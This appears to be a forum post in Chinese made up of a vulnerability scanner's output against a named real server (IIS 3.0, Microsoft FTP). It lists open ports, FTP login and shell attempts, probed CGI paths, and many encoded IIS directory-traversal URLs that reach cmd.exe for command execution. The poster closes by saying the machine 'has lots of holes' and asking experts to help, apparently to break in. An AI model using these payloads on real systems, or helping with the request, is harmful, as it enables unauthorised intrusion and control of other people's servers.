扫描目标:202.xxx.xxx.xxx
扫描选项:
FTP漏洞
SMTP漏洞
FINGER漏洞
CGI漏洞
IIS漏洞
SQL_SA_NULL漏洞
RPC漏洞
NTUSER漏洞
开始扫描......
目标IP地址为:202.107.245.1
扫描目标主机开放的端口:
21号端口(ftp)开放!
70号端口(未知)开放!
80号端口(未知)开放!
135号端口(未知)开放!
139号端口(nbsession)开放!
1433号端口(未知)开放!
开始扫描FTP漏洞:
FTP服务器的Banner:
220 qzdxweb1 Microsoft FTP Service (Version 3.0).
测试匿名用户
530 User anonymous cannot log in.
根目录列表:
530 Please login with USER and PASS.
尝试改变主目录属性为可写:
530 Please login with USER and PASS.
尝试建立目录:
530 Please login with USER and PASS.
尝试执行Shell:
530 Please login with USER and PASS.
开始扫描SMTP漏洞:
目标没有开放SMTP服务...
开始扫描FINGER漏洞:
目标没有开放FINGER服务...
开始扫描CGI漏洞:
WWW服务器的Banner:
HTTP/1.0 200 OK
Server: Microsoft-IIS/3.0
Date: Sat, 23 Sep 2000 16:43:37 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 26 May 1998 07:45:26 GMT
Content-Length: 138
开始CGI漏洞的扫描,由于扫描漏洞数量较多,请耐心等待...
发现/_private漏洞
发现/_vti_bin/shtml.exe漏洞
发现/_vti_bin/shtml.dll漏洞
发现/_vti_inf.html漏洞
发现/cgi-bin漏洞
发现/cgi-bin/imagemap.exe漏洞
发现/cgi-bin/htimage.exe漏洞
发现/msadc/msadcs.dll漏洞
发现/scripts/tools/getdrvrs.exe漏洞
发现/scripts/tools/dsnform.exe漏洞
发现/scripts/tools/mkilog.exe漏洞
发现/scripts/tools/newdsn.exe漏洞
开始扫描IIS漏洞:
WWW服务器的Banner:
HTTP/1.0 200 OK
Server: Microsoft-IIS/3.0
Date: Sat, 23 Sep 2000 16:45:43 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 26 May 1998 07:45:26 GMT
Content-Length: 138
开始IIS漏洞的扫描,由于扫描漏洞数量较多,请耐心等待...
发现/scripts/..%252f../winnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/scripts/msadc/..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/msadc/..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/_vti_bin/..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/_vti_bin/msadc/..%252f../..%252f../..%252f../..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\漏洞
发现/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\漏洞
开始扫描SQL_SA_NULL漏洞:
----SQL_SA_NULL SCANER for Windows NT/2K/9X--Author by HORSE_B(Send all feedbacks and bug report to bhorse@cattsoft.com)
这台机器的洞蛮多的。我是新来的。请高手帮忙!!